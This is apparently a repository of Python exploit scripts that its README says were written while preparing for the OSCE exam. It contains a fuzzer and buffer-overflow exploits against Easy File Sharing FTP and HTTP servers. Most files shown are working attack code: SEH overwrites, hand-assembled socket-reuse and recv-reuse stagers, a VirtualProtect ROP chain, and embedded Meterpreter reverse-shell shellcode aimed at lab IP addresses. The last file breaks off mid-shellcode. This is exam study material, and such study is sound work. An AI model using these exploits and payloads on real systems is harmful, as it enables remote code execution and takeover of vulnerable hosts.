├── README.md
├── TCP_Fuzzer.py
├── easyfileshareftp.py
├── easyfileshareftp_recreate_socket.py
├── easyfileshareftp_recv_reuse.py
├── easyfilesharehttp.py
├── egg_fuzzysecurity_4.py
├── gmon_vulnserver.py
├── gter_vulnserver.py
├── hter_vulnserver.py
├── kstet_vulnserver.py
├── lter_vulnserver.py
├── mini-stream.py
├── minshare_fileserver.py
├── myftp.py
├── myftp_recreate_socket.py
├── pcman_ftp.py
├── quickzip_backup_no_pop_esp.py
├── quickzip_redo.py
├── seh_exploitdb.py
├── seh_fuzzysecurity.py
├── trun_recreate_socket.py
├── trun_recv_reuse.py
├── trun_vulnserver.py
├── zipper_poc.py
└── zipper_redo.py


/README.md:
--------------------------------------------------------------------------------
1 | # OSCE-Exploit-Scripts
2 | 
3 | Here's the graveyard for all the exploits I wrote while preparing for OSCE exam by Offensive Security. 
4 | 


--------------------------------------------------------------------------------
/TCP_Fuzzer.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import socket
 4 | 
 5 | host = '10.1.10.34'
 6 | port = 21
 7 | 
 8 | def fuzz(payload):
 9 |   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10 |   s.connect((host, port))
11 |   s.recv(2048)
12 |   s.send(payload)
13 |   s.shutdown
14 |   s.close
15 | 
16 | print "[*] Fuzzing {0}:{1} ...".format(host, port)
17 | for i in range(1, 100):
18 |   name = "A" * (i * 0x10)
19 |   command = "USER {0}\r\n".format(name)
20 |   print "[*] Username {0} chars, Command {1} chars...".format(len(name), len(command))
21 |   fuzz(command)


--------------------------------------------------------------------------------
/easyfileshareftp.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import socket
 4 | from ftplib import FTP
 5 | from struct import pack
 6 | 
 7 | host = '172.16.192.168'
 8 | port = 21
 9 | max_size = 3500
10 | eip_offset = 2559
11 | 
12 | shellcode =  ""
13 | shellcode += "\xdb\xcd\xbb\xab\x9b\xfd\xb9\xd9\x74\x24\xf4\x5f"
14 | shellcode += "\x2b\xc9\xb1\x56\x83\xc7\x04\x31\x5f\x14\x03\x5f"
15 | shellcode += "\xbf\x79\x08\x45\x57\xff\xf3\xb6\xa7\x60\x7d\x53"
16 | shellcode += "\x96\xa0\x19\x17\x88\x10\x69\x75\x24\xda\x3f\x6e"
17 | shellcode += "\xbf\xae\x97\x81\x08\x04\xce\xac\x89\x35\x32\xae"
18 | shellcode += "\x09\x44\x67\x10\x30\x87\x7a\x51\x75\xfa\x77\x03"
19 | shellcode += "\x2e\x70\x25\xb4\x5b\xcc\xf6\x3f\x17\xc0\x7e\xa3"
20 | shellcode += "\xef\xe3\xaf\x72\x64\xba\x6f\x74\xa9\xb6\x39\x6e"
21 | shellcode += "\xae\xf3\xf0\x05\x04\x8f\x02\xcc\x55\x70\xa8\x31"
22 | shellcode += "\x5a\x83\xb0\x76\x5c\x7c\xc7\x8e\x9f\x01\xd0\x54"
23 | shellcode += "\xe2\xdd\x55\x4f\x44\x95\xce\xab\x75\x7a\x88\x38"
24 | shellcode += "\x79\x37\xde\x67\x9d\xc6\x33\x1c\x99\x43\xb2\xf3"
25 | shellcode += "\x28\x17\x91\xd7\x71\xc3\xb8\x4e\xdf\xa2\xc5\x91"
26 | shellcode += "\x80\x1b\x60\xd9\x2c\x4f\x19\x80\x38\xbc\x10\x3b"
27 | shellcode += "\xb8\xaa\x23\x48\x8a\x75\x98\xc6\xa6\xfe\x06\x10"
28 | shellcode += "\xbf\xe9\xb8\xce\x07\x79\x47\xef\x77\x53\x8c\xbb"
29 | shellcode += "\x27\xcb\x25\xc4\xac\x0b\xc9\x11\x58\x06\x5d\x36"
30 | shellcode += "\x8c\xd6\x77\x2e\xae\xd6\x99\x60\x27\x30\xf5\x2e"
31 | shellcode += "\x67\xed\xb6\x9e\xc7\x5d\x5f\xf5\xc8\x82\x7f\xf6"
32 | shellcode += "\x03\xab\xea\x19\xfd\x83\x82\x80\xa4\x58\x32\x4c"
33 | shellcode += "\x73\x25\x74\xc6\x71\xd9\x3b\x2f\xf0\xc9\x2c\x48"
34 | shellcode += "\xfa\x11\xad\xfd\xfa\x7b\xa9\x57\xad\x13\xb3\x8e"
35 | shellcode += "\x99\xbb\x4c\xe5\x9a\xbc\xb3\x78\xaa\xb7\x82\xee"
36 | shellcode += "\x92\xaf\xea\xfe\x12\x30\xbd\x94\x12\x58\x19\xcd"
37 | shellcode += "\x41\x7d\x66\xd8\xf6\x2e\xf3\xe3\xae\x83\x54\x8c"
38 | shellcode += "\x4c\xfd\x93\x13\xaf\x28\xa0\x54\x4f\xae\x8f\xfc"
39 | shellcode += "\x27\x50\x90\xfc\xb7\x3a\x10\xad\xdf\xb1\x3f\x42"
40 | shellcode += "\x2f\x39\xea\x0b\x27\xb0\x7b\xf9\xd6\xc5\x51\x5f"
41 | shellcode += "\x46\xc5\x56\x44\x79\xbc\x17\x7b\x7a\x41\x3e\x18"
42 | shellcode += "\x7b\x41\x3e\x1e\x40\x97\x07\x54\x87\x2b\x3c\x67"
43 | shellcode += "\xb2\x0e\x15\xe2\xbc\x1d\x65\x27"
44 | 
45 | #\x00\x0a\x0d\x20
46 | payload = "\x2c" + "A" * eip_offset
47 | payload += "\xEB\x10\x90\x90"
48 | payload += pack("<L",0x10012462)
49 | payload += "\x90" * 20
50 | payload += shellcode
51 | payload += "C" * (max_size - len(payload))
52 | print "[*] Sending payload of size: {0}".format(len(payload))
53 | ftp = FTP(host)
54 | ftp.login('anonymous',payload)
55 | ftp.close()
56 | 


--------------------------------------------------------------------------------
/easyfileshareftp_recreate_socket.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | # -*- coding: utf-8 -*-
  3 | 
  4 | import socket
  5 | from ftplib import FTP
  6 | from struct import pack
  7 | from time import sleep
  8 | 
  9 | host = '172.16.192.167'
 10 | port = 21
 11 | max_size = 3500
 12 | eip_offset = 2559
 13 |  
 14 | rev_met_7887 =  ""
 15 | rev_met_7887 += "\xbb\x4e\x27\x19\xfe\xdb\xca\xd9\x74\x24\xf4"
 16 | rev_met_7887 += "\x5d\x2b\xc9\xb1\x56\x31\x5d\x13\x03\x5d\x13"
 17 | rev_met_7887 += "\x83\xed\xb2\xc5\xec\x02\xa2\x88\x0f\xfb\x32"
 18 | rev_met_7887 += "\xed\x86\x1e\x03\x2d\xfc\x6b\x33\x9d\x76\x39"
 19 | rev_met_7887 += "\xbf\x56\xda\xaa\x34\x1a\xf3\xdd\xfd\x91\x25"
 20 | rev_met_7887 += "\xd3\xfe\x8a\x16\x72\x7c\xd1\x4a\x54\xbd\x1a"
 21 | rev_met_7887 += "\x9f\x95\xfa\x47\x52\xc7\x53\x03\xc1\xf8\xd0"
 22 | rev_met_7887 += "\x59\xda\x73\xaa\x4c\x5a\x67\x7a\x6e\x4b\x36"
 23 | rev_met_7887 += "\xf1\x29\x4b\xb8\xd6\x41\xc2\xa2\x3b\x6f\x9c"
 24 | rev_met_7887 += "\x59\x8f\x1b\x1f\x88\xde\xe4\x8c\xf5\xef\x16"
 25 | rev_met_7887 += "\xcc\x32\xd7\xc8\xbb\x4a\x24\x74\xbc\x88\x57"
 26 | rev_met_7887 += "\xa2\x49\x0b\xff\x21\xe9\xf7\xfe\xe6\x6c\x73"
 27 | rev_met_7887 += "\x0c\x42\xfa\xdb\x10\x55\x2f\x50\x2c\xde\xce"
 28 | rev_met_7887 += "\xb7\xa5\xa4\xf4\x13\xee\x7f\x94\x02\x4a\xd1"
 29 | rev_met_7887 += "\xa9\x55\x35\x8e\x0f\x1d\xdb\xdb\x3d\x7c\xb3"
 30 | rev_met_7887 += "\x28\x0c\x7f\x43\x27\x07\x0c\x71\xe8\xb3\x9a"
 31 | rev_met_7887 += "\x39\x61\x1a\x5c\x48\x65\x9d\xb2\xf2\xe6\x63"
 32 | rev_met_7887 += "\x33\x02\x2e\xa0\x67\x52\x58\x01\x08\x39\x98"
 33 | rev_met_7887 += "\xae\xdd\xd7\x92\x38\x72\x37\x63\x52\xe2\x35"
 34 | rev_met_7887 += "\x63\xbd\x3c\xb0\x85\x91\x92\x92\x19\x52\x43"
 35 | rev_met_7887 += "\x52\xca\x3a\x89\x5d\x35\x5a\xb2\xb4\x5e\xf1"
 36 | rev_met_7887 += "\x5d\x60\x36\x6e\xc7\x29\xcc\x0f\x08\xe4\xa8"
 37 | rev_met_7887 += "\x10\x82\x0c\x4c\xde\x63\x65\x5e\x37\x14\x85"
 38 | rev_met_7887 += "\x9e\xc8\xb1\x85\xf4\xcc\x13\xd2\x60\xcf\x42"
 39 | rev_met_7887 += "\x14\x2f\x30\xa1\x27\x28\xce\x34\x11\x42\xf9"
 40 | rev_met_7887 += "\xa2\x1d\x3c\x06\x23\x9d\xbc\x50\x29\x9d\xd4"
 41 | rev_met_7887 += "\x04\x09\xce\xc1\x4a\x84\x63\x5a\xdf\x27\xd5"
 42 | rev_met_7887 += "\x0e\x48\x40\xdb\x69\xbe\xcf\x24\x5c\xbc\x08"
 43 | rev_met_7887 += "\xda\x22\xeb\xb0\xb2\xdc\xab\x40\x42\xb7\x2b"
 44 | rev_met_7887 += "\x11\x2a\x4c\x03\x9e\x9a\xad\x8e\xf7\xb2\x24"
 45 | rev_met_7887 += "\x5f\xb5\x23\x38\x4a\x1b\xfd\x39\x79\x80\x0e"
 46 | rev_met_7887 += "\x43\xf2\x37\xef\xb4\x1a\x5c\xf0\xb4\x22\x62"
 47 | rev_met_7887 += "\xcd\x62\x1b\x10\x10\xb7\x18\x2b\x27\x9a\x09"
 48 | rev_met_7887 += "\xa6\x47\x88\x4a\xe3"
 49 | 
 50 | 
 51 | exploit = "" 
 52 | exploit += "\xB0\x06"              		#    MOV AL,6
 53 | exploit += "\x50"           		      	#    PUSH EAX
 54 | exploit += "\xB0\x01"              		#    MOV AL,1
 55 | exploit += "\x50"           		      	#    PUSH EAX
 56 | exploit += "\x40"					              	# 	 INC EAX
 57 | exploit += "\x50"                 			#    PUSH EAX
 58 | exploit += "\xBB\x44\x9E\x62\x45"  		#    MOV EBX,45629E44
 59 | exploit += "\xC1\xEB\x08"     		     #    SHR EBX,8
 60 | exploit += "\xFF\xD3"				           	# 	 CALL EBX ; socket(2,1,6)
 61 | 
 62 | exploit += "\x8B\xF8"	              	#    MOV EDI,EAX ; store socket handle
 63 | exploit += "\x83\xEC\x28" 			       	#    SUB ESP,28
 64 | exploit += "\x54" 				             		#    PUSH ESP
 65 | exploit += "\x59" 						             #    POP ECX
 66 | exploit += "\xC6\x01\x02" 		       		#    MOV BYTE PTR DS:[ECX],2
 67 | exploit += "\xC6\x41\x03\x16"	       #	   MOV BYTE PTR DS:[ECX +3],16
 68 | exploit += "\x6A\x10" 					          #    PUSH 10
 69 | exploit += "\x51"  						            #    PUSH ECX
 70 | exploit += "\x57"  						            #    PUSH EDI
 71 | exploit += "\x66\xBB\xA4\x62" 		    	#    MOV BX,62A4
 72 | exploit += "\xFF\xD3"				           	# 	 CALL EBX ; bind(socket handle,socket addr struct,10)
 73 | 
 74 | exploit += "\x66\xBB\x86\x62"   	    #    MOV BX,6286
 75 | exploit += "\x6A\x7F"				            #    PUSH 7F
 76 | exploit += "\x57"					               #    PUSH EDI
 77 | exploit += "\xFF\xD3"				            #    CALL EBX
 78 | 
 79 | exploit += "\xB3\xF8"    			        	#    MOV BL,0F8
 80 | exploit += "\x50"     				          	#    PUSH EAX
 81 | exploit += "\x50"     				          	#    PUSH EAX
 82 | exploit += "\x57"     				          	#    PUSH EDX
 83 | exploit += "\xFF\xD3"				            #    CALL EBX
 84 | 
 85 | exploit += "\x8B\xF8"	              	#    MOV EDI,EAX ; store accept handle
 86 | exploit += "\x33\xD2" 				           #    XOR EDX,EDX
 87 | exploit += "\x52"   					            #    PUSH EDX
 88 | exploit += "\xB6\x02"   		         		#    MOV DH,2
 89 | exploit += "\x52"					               #    PUSH EDX
 90 | exploit += "\x54"					               #    PUSH ESP
 91 | exploit += "\x59"					               #    POP ECX
 92 | exploit += "\x66\x81\xC1\x99\x0F"    #    ADD CX,0F81
 93 | exploit += "\x51"					               #    PUSH ECX
 94 | exploit += "\xB3\x74"				            #    MOV BL,74
 95 | exploit += "\x57"				               	#    push EDI	
 96 | exploit += "\xFF\xD3" 			       	    #    CALL EBX
 97 | 
 98 | payload = "PASS "
 99 | payload += "\x2c" + "A" * eip_offset
100 | payload += "\xEB\x0e\x90\x90"
101 | payload += pack("<L",0x10012462)
102 | payload += "\x90" * 10
103 | payload += exploit
104 | # payload += "E" * (max_size - len(payload))
105 | payload += "\x90" * 20
106 | 
107 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
108 | s.connect((host, port))
109 | print s.recv(2048)
110 | print "[*] Sending USER anonymous"
111 | s.send("USER anonymous\r\n")
112 | print s.recv(2048)
113 | s.send(payload + "\r\n")
114 | 
115 | print "[*] Send Payload 1 To Target: {0} on Port: {1}".format(host,port)
116 | sleep(2)	# Need time to pass exception since SEH based
117 | print "[*] Sleeping for 2 seconds ...."
118 | b = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
119 | b.connect((host, 22))
120 | b.send(rev_met_7887, port+1)
121 | 
122 | print "[*] Send Payload 2 To Target: {0} on Port: {1}".format(host,port+1)
123 | 
124 | 
125 | 
126 | # 0045629E   $-FF25 9CE74700  JMP DWORD PTR DS:[<&WSOCK32.#23>]        ;  WS2_32.socket (2,1,0)
127 | # 004562A4   $-FF25 A0E74700  JMP DWORD PTR DS:[<&WSOCK32.#2>]         ;  WS2_32.bind
128 | # 00456286   $-FF25 8CE74700  JMP DWORD PTR DS:[<&WSOCK32.#13>]        ;  WS2_32.listen
129 | # 004562F8   $-FF25 48E74700  JMP DWORD PTR DS:[<&WSOCK32.#1>]         ;  WS2_32.accept
130 | # 00456274   $-FF25 80E74700  JMP DWORD PTR DS:[<&WSOCK32.#16>]        ;  WSOCK32.recv
131 | 


--------------------------------------------------------------------------------
/easyfileshareftp_recv_reuse.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | import socket
 5 | from ftplib import FTP
 6 | from struct import pack
 7 | from time import sleep
 8 | 
 9 | host = '172.16.192.167'
10 | port = 21
11 | max_size = 3500
12 | eip_offset = 2559
13 | 
14 | rev_met_7887 =  ""
15 | rev_met_7887 += "\xb8\xc6\x9a\xd2\xb8\x89\xf6\x33\xc9\xb1\x56"
16 | rev_met_7887 += "\x31\x46\x13\x03\x46\x13\x83\xee\x3a\x78\x27"
17 | rev_met_7887 += "\x44\x2a\xff\xc8\xb5\xaa\x60\x40\x50\x9b\xa0"
18 | rev_met_7887 += "\x36\x10\x8b\x10\x3c\x74\x27\xda\x10\x6d\xbc"
19 | rev_met_7887 += "\xae\xbc\x82\x75\x04\x9b\xad\x86\x35\xdf\xac"
20 | rev_met_7887 += "\x04\x44\x0c\x0f\x35\x87\x41\x4e\x72\xfa\xa8"
21 | rev_met_7887 += "\x02\x2b\x70\x1e\xb3\x58\xcc\xa3\x38\x12\xc0"
22 | rev_met_7887 += "\xa3\xdd\xe2\xe3\x82\x73\x79\xba\x04\x75\xae"
23 | rev_met_7887 += "\xb6\x0c\x6d\xb3\xf3\xc7\x06\x07\x8f\xd9\xce"
24 | rev_met_7887 += "\x56\x70\x75\x2f\x57\x83\x87\x77\x5f\x7c\xf2"
25 | rev_met_7887 += "\x81\x9c\x01\x05\x56\xdf\xdd\x80\x4d\x47\x95"
26 | rev_met_7887 += "\x33\xaa\x76\x7a\xa5\x39\x74\x37\xa1\x66\x98"
27 | rev_met_7887 += "\xc6\x66\x1d\xa4\x43\x89\xf2\x2d\x17\xae\xd6"
28 | rev_met_7887 += "\x76\xc3\xcf\x4f\xd2\xa2\xf0\x90\xbd\x1b\x55"
29 | rev_met_7887 += "\xda\x53\x4f\xe4\x81\x3b\xbc\xc5\x39\xbb\xaa"
30 | rev_met_7887 += "\x5e\x49\x89\x75\xf5\xc5\xa1\xfe\xd3\x12\xb0"
31 | rev_met_7887 += "\xe9\xe3\xcd\x7a\x79\x1a\xee\x7a\x53\xd9\xba"
32 | rev_met_7887 += "\x2a\xcb\xc8\xc2\xa1\x0b\xf4\x16\x5f\x06\x62"
33 | rev_met_7887 += "\x35\x8f\xd6\x98\x2d\xad\xd6\x42\x61\x38\x30"
34 | rev_met_7887 += "\x2a\x2d\x6a\xed\x8b\x9d\xca\x5d\x64\xf4\xc5"
35 | rev_met_7887 += "\x82\x94\xf7\x0c\xab\x3f\x18\xf8\x83\xd7\x81"
36 | rev_met_7887 += "\xa1\x58\x49\x4d\x7c\x25\x49\xc5\x74\xd9\x04"
37 | rev_met_7887 += "\x2e\xfd\xc9\x71\x49\xfd\x11\x82\xfc\xfd\x7b"
38 | rev_met_7887 += "\x86\x56\xaa\x13\x84\x8f\x9c\xbb\x77\xfa\x9f"
39 | rev_met_7887 += "\xbc\x88\x7b\xa9\xb7\xbf\xe9\x95\xaf\xbf\xfd"
40 | rev_met_7887 += "\x15\x30\x96\x97\x15\x58\x4e\xcc\x46\x7d\x91"
41 | rev_met_7887 += "\xd9\xfb\x2e\x04\xe2\xad\x83\x8f\x8a\x53\xfd"
42 | rev_met_7887 += "\xf8\x14\xac\x28\x7b\x52\x52\xae\x54\xfb\x3a"
43 | rev_met_7887 += "\x50\xe5\xfb\xba\x3a\xe5\xab\xd2\xb1\xca\x44"
44 | rev_met_7887 += "\x12\x39\xc1\x0c\x3a\xb0\x84\xff\xdb\xc5\x8c"
45 | rev_met_7887 += "\x5e\x45\xc5\x23\x7b\x76\xbc\x4c\x7c\x77\x41"
46 | rev_met_7887 += "\x45\x19\x78\x41\x69\x1f\x45\x97\x50\x55\x88"
47 | rev_met_7887 += "\x2b\xe7\x66\xbf\x0e\x4e\xed\xbf\x1d\x90\x24"
48 | 
49 | exploit  = ""
50 | exploit += "\x50"    				      	#    PUSH EAX - FLAGS
51 | exploit += "\xB4\x02"    			    	#    MOV AH,2 
52 | exploit += "\x50"    					      #    PUSH EAX - SIZE
53 | exploit += "\x54"    					      #    PUSH ESP
54 | exploit += "\x58"    					      #    POP EAX
55 | 
56 | exploit += "\x66\x05\x38\x0F"  			#    ADD AX,0F38
57 | exploit += "\x8B\xF0"  					    #    MOV ESI, EAX	
58 | exploit += "\x50"  						      #    PUSH EAX - BUFFER
59 | exploit += "\x66\x2D\xF6\x0E"  			#    SUB AX,0EF6
60 | exploit += "\x80\xC4\x01"  			  	#    HACK BC 0D NOT ALLOWED; ADD 1 
61 | exploit += "\xFF\x30"  				    	#    PUSH DWORD PTR DS:[EAX] - HANDLER	
62 | exploit += "\xBB\x77\x74\x62\x45"  	#    MOV EBX,45627477
63 | exploit += "\xC1\xEB\x08"  				  #    SHR EBX,8
64 | exploit += "\xFF\xD3"  					    #    CALL [EBX]
65 | 
66 | payload = "PASS "
67 | payload += "\x2c" + "A" * eip_offset
68 | payload += "\xEB\x0e\x90\x90"
69 | payload += pack("<L",0x10012462)
70 | payload += "\x90" * 10	
71 | payload += exploit	
72 | payload += "\x90" * 4
73 | 
74 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
75 | s.connect((host, port))
76 | print "[*] Connected To Target: {0} on Port: {1}".format(host,port)
77 | print s.recv(2048)
78 | print "[*] Sending USER anonymous"
79 | s.send("USER anonymous\r\n")
80 | print s.recv(2048)
81 | s.send(payload + "\r\n")
82 | print "[*] Sent Payload: {0}\r\nLength: {1}".format(payload,len(payload))
83 | s.send(rev_met_7887)
84 | s.close
85 | 
86 | # 0045629E   $-FF25 9CE74700  JMP DWORD PTR DS:[<&WSOCK32.#23>]        ;  WS2_32.socket
87 | # 004562A4   $-FF25 A0E74700  JMP DWORD PTR DS:[<&WSOCK32.#2>]         ;  WS2_32.bind
88 | # 00456286   $-FF25 8CE74700  JMP DWORD PTR DS:[<&WSOCK32.#13>]        ;  WS2_32.listen
89 | # 004562F8   $-FF25 48E74700  JMP DWORD PTR DS:[<&WSOCK32.#1>]         ;  WS2_32.accept
90 | # 00456274   $-FF25 80E74700  JMP DWORD PTR DS:[<&WSOCK32.#16>]        ;  WSOCK32.recv
91 | 


--------------------------------------------------------------------------------
/easyfilesharehttp.py:
--------------------------------------------------------------------------------
  1 | import socket
  2 | from struct import pack
  3 | 
  4 | host = "172.16.192.167"
  5 | port = 80
  6 | 
  7 | max_size = 5000
  8 | eax_offset = 4127
  9 | seh_offset = 4059
 10 | split = 2923
 11 | 
 12 | def create_rop_chain():
 13 |   # rop chain generated with mona.py - www.corelan.be
 14 |   rop_gadgets = [
 15 | 
 16 | 	0x10015442,  # POP EAX # RETN [ImageLoad.dll]
 17 |     0xFFFFFDFF,  # Value of '-201'
 18 |     0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
 19 |   
 20 |     # Put EAX into EBX (other unneccessary stuff comes with this gadget as well...)
 21 |     0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN
 22 | 
 23 |     0x10015442,  # POP EAX # RETN [ImageLoad.dll] 
 24 |     0x61c832d0,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
 25 | 
 26 |     0x1001281a,  # ADD ESP,4 # RETN [ImageLoad.dll]
 27 |     0x61c73281,  # &Writable location [sqlite3.dll
 28 | 
 29 |     0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 
 30 |     0x61c0a798,  # XCHG EAX,EDI # RETN [sqlite3.dll] 
 31 |     0x1001e5a0,  # POP ESI # RETN [ImageLoad.dll] 
 32 |     0xffffffff,  #  
 33 |     0x1001715d,  # INC ESI # ADD AL,3A # RETN [ImageLoad.dll] 
 34 |     0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] 
 35 |     0x1001c1c8,  # POP EBP # RETN [ImageLoad.dll] 
 36 |     0x61c24169,  # & push esp # ret  [sqlite3.dll]
 37 |     0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll] 
 38 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 39 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 40 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 41 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 42 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 43 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 44 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 45 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 46 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 47 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 48 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 49 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 50 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 51 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 52 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 53 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 54 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 55 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 56 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 57 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 58 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 59 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 60 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 61 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 62 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 63 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 64 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 65 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 66 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 67 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 68 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 69 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 70 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 71 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 72 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 73 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 74 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 75 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 76 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 77 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 78 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 79 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 80 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 81 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 82 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 83 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 84 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 85 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 86 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 87 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 88 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 89 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 90 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 91 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 92 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 93 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 94 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 95 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 96 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 97 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 98 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
 99 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
100 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
101 |     0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
102 |     0x1001bd98,  # POP ECX # RETN [ImageLoad.dll] 
103 |     0x61c80fe1,  # &Writable location [sqlite3.dll]
104 |     0x10019fbc,  # POP EDI # RETN [ImageLoad.dll] 
105 |     0x10021058,  # RETN (ROP NOP) [ImageLoad.dll]
106 |     0x10015442,  # POP EAX # RETN [ImageLoad.dll] 
107 |     0x90909090,  # nop
108 |     0x100240c2,  # PUSHAD # RETN [ImageLoad.dll] 
109 |   ]
110 |   return ''.join(pack('<I', _) for _ in rop_gadgets)
111 | 
112 | rev_met_7887  = "\xba\xb5\x50\x32\x63\xda\xdb\xd9\x74\x24\xf4"
113 | rev_met_7887 += "\x5e\x33\xc9\xb1\x56\x31\x56\x13\x03\x56\x13"
114 | rev_met_7887 += "\x83\xee\x49\xb2\xc7\x9f\x59\xb1\x28\x60\x99"
115 | rev_met_7887 += "\xd6\xa1\x85\xa8\xd6\xd6\xce\x9a\xe6\x9d\x83"
116 | rev_met_7887 += "\x16\x8c\xf0\x37\xad\xe0\xdc\x38\x06\x4e\x3b"
117 | rev_met_7887 += "\x76\x97\xe3\x7f\x19\x1b\xfe\x53\xf9\x22\x31"
118 | rev_met_7887 += "\xa6\xf8\x63\x2c\x4b\xa8\x3c\x3a\xfe\x5d\x49"
119 | rev_met_7887 += "\x76\xc3\xd6\x01\x96\x43\x0a\xd1\x99\x62\x9d"
120 | rev_met_7887 += "\x6a\xc0\xa4\x1f\xbf\x78\xed\x07\xdc\x45\xa7"
121 | rev_met_7887 += "\xbc\x16\x31\x36\x15\x67\xba\x95\x58\x48\x49"
122 | rev_met_7887 += "\xe7\x9d\x6e\xb2\x92\xd7\x8d\x4f\xa5\x23\xec"
123 | rev_met_7887 += "\x8b\x20\xb0\x56\x5f\x92\x1c\x67\x8c\x45\xd6"
124 | rev_met_7887 += "\x6b\x79\x01\xb0\x6f\x7c\xc6\xca\x8b\xf5\xe9"
125 | rev_met_7887 += "\x1c\x1a\x4d\xce\xb8\x47\x15\x6f\x98\x2d\xf8"
